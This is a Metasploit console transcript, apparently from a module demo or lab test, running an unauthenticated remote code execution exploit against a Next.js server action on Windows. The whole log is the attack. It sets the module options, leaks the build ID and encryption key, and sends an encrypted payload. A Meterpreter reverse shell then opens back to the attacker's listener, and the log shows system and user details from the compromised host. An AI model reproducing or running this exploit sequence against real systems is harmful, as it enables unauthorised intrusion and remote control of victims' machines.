msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set RPORT 4330
RPORT => 4330
msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set LHOST eth0
LHOST => eth0
msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set APP_ROUTER app-cache
APP_ROUTER => app-cache
msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set PAGES_ROUTER pages-cache
PAGES_ROUTER => pages-cache
msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set PATH_SEGMENT seed
PATH_SEGMENT => seed
msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set ACTION_PATH /
ACTION_PATH => /
msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > set TARGET_FIELD lastName
TARGET_FIELD => lastName
msf exploit(windows/http/nextjs_unauth_rce_cve_2026_75604) > run
[*] Started reverse TCP handler on 192.168.19.153:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Vulnerable build ID found: alcHhWTGd50Ebs_MOMzhr and encryption key successfully leaked, the target seems to be vulnerable
[*] Fetching application Build ID...
[+] Successfully retrieved Build ID: alcHhWTGd50Ebs_MOMzhr
[*] Leaking server reference manifest...
[*] Searching for available Server Actions at path: /...
[+] Selected Action ID: 60449a017e36a522df12b950725add590d624573f9 (Ref: 1)
[*] Encrypting bound arguments payload...
[*] Sending exploit request to target server...
[*] Request sent, awaiting payload execution...
[*] Sending stage (232006 bytes) to 192.168.19.159
[*] Meterpreter session 1 opened (192.168.19.153:4444 -> 192.168.19.159:50280) at 2026-08-26 18:54:18 -0400

meterpreter > sysinfo
Computer        : DESKTOP-GLLA9J3
OS              : Windows 10 21H2 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-GLLA9J3\vognik
meterpreter >
```